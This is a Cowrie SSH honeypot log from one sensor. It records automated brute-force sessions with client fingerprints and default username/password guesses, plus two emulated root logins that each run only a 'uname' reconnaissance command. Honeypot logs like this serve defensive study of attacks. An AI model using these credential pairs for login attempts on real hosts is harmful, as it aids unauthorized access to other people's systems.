{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:46.665417Z","src_ip":"212.227.125.160","session":"f6b638c13ea8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:46.880553Z","src_ip":"212.227.125.160","session":"f6b638c13ea8"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:47.528750Z","src_ip":"212.227.125.160","session":"f6b638c13ea8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:48.746366Z","src_ip":"212.227.125.160","session":"f6b638c13ea8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46116,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9eafe14fc0f","protocol":"ssh","message":"New connection: 212.227.235.229:46116 (1.2.3.4:22) [session: a9eafe14fc0f]","sensor":"my-vps","timestamp":"2025-08-28T03:27:49.092814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:27:49.100966Z","src_ip":"212.227.235.229","session":"a9eafe14fc0f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:27:49.236380Z","src_ip":"212.227.235.229","session":"a9eafe14fc0f"}
{"eventid":"cowrie.login.failed","username":"sara","password":"123456","message":"login attempt [sara/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:49.650982Z","src_ip":"212.227.235.229","session":"a9eafe14fc0f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:50.864453Z","src_ip":"212.227.235.229","session":"a9eafe14fc0f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":37064,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0e5a6e0a73f","protocol":"ssh","message":"New connection: 45.125.211.194:37064 (1.2.3.4:22) [session: e0e5a6e0a73f]","sensor":"my-vps","timestamp":"2025-08-28T03:27:54.645232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:54.674514Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:54.859611Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52092,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b0fe83ea0bc","protocol":"ssh","message":"New connection: 212.227.235.229:52092 (1.2.3.4:22) [session: 9b0fe83ea0bc]","sensor":"my-vps","timestamp":"2025-08-28T03:27:55.397724Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:55.399026Z","src_ip":"212.227.235.229","session":"9b0fe83ea0bc"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:27:55.695331Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:27:56.196156Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:27:56.196876Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:56.420775Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:56.421979Z","src_ip":"45.125.211.194","session":"e0e5a6e0a73f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34298,"dst_ip":"1.2.3.4","dst_port":22,"session":"18f06d044d77","protocol":"ssh","message":"New connection: 212.227.235.229:34298 (1.2.3.4:22) [session: 18f06d044d77]","sensor":"my-vps","timestamp":"2025-08-28T03:28:01.029772Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:01.030838Z","src_ip":"212.227.235.229","session":"18f06d044d77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44740,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e9e39dca1e","protocol":"ssh","message":"New connection: 212.227.235.229:44740 (1.2.3.4:22) [session: d5e9e39dca1e]","sensor":"my-vps","timestamp":"2025-08-28T03:28:06.764388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:06.765285Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:07.015976Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:28:07.767421Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:28:08.379858Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:28:08.380550Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:08.631469Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:08.632542Z","src_ip":"212.227.235.229","session":"d5e9e39dca1e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19180,"dst_ip":"1.2.3.4","dst_port":22,"session":"60a61d9278e8","protocol":"ssh","message":"New connection: 45.125.211.194:19180 (1.2.3.4:22) [session: 60a61d9278e8]","sensor":"my-vps","timestamp":"2025-08-28T03:28:09.471058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:09.499417Z","src_ip":"45.125.211.194","session":"60a61d9278e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:09.692719Z","src_ip":"45.125.211.194","session":"60a61d9278e8"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:10.517649Z","src_ip":"45.125.211.194","session":"60a61d9278e8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:11.728071Z","src_ip":"45.125.211.194","session":"60a61d9278e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54732,"dst_ip":"1.2.3.4","dst_port":22,"session":"420a368ca576","protocol":"ssh","message":"New connection: 212.227.125.160:54732 (1.2.3.4:22) [session: 420a368ca576]","sensor":"my-vps","timestamp":"2025-08-28T03:28:15.407294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:15.408313Z","src_ip":"212.227.125.160","session":"420a368ca576"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:15.626760Z","src_ip":"212.227.125.160","session":"420a368ca576"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:16.284535Z","src_ip":"212.227.125.160","session":"420a368ca576"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:17.505038Z","src_ip":"212.227.125.160","session":"420a368ca576"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":21582,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad2ea4035570","protocol":"ssh","message":"New connection: 45.125.211.194:21582 (1.2.3.4:22) [session: ad2ea4035570]","sensor":"my-vps","timestamp":"2025-08-28T03:28:24.168912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:24.177966Z","src_ip":"45.125.211.194","session":"ad2ea4035570"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:24.396494Z","src_ip":"45.125.211.194","session":"ad2ea4035570"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:25.290606Z","src_ip":"45.125.211.194","session":"ad2ea4035570"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:26.516644Z","src_ip":"45.125.211.194","session":"ad2ea4035570"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58264,"dst_ip":"1.2.3.4","dst_port":22,"session":"b75ef2cb84b6","protocol":"ssh","message":"New connection: 212.227.235.229:58264 (1.2.3.4:22) [session: b75ef2cb84b6]","sensor":"my-vps","timestamp":"2025-08-28T03:28:29.506645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:29.507578Z","src_ip":"212.227.235.229","session":"b75ef2cb84b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:29.775505Z","src_ip":"212.227.235.229","session":"b75ef2cb84b6"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:30.580899Z","src_ip":"212.227.235.229","session":"b75ef2cb84b6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:31.851717Z","src_ip":"212.227.235.229","session":"b75ef2cb84b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40472,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcafc0317bfc","protocol":"ssh","message":"New connection: 212.227.235.229:40472 (1.2.3.4:22) [session: bcafc0317bfc]","sensor":"my-vps","timestamp":"2025-08-28T03:28:35.230078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:35.230989Z","src_ip":"212.227.235.229","session":"bcafc0317bfc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:35.481698Z","src_ip":"212.227.235.229","session":"bcafc0317bfc"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:36.372875Z","src_ip":"212.227.235.229","session":"bcafc0317bfc"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:37.625834Z","src_ip":"212.227.235.229","session":"bcafc0317bfc"}
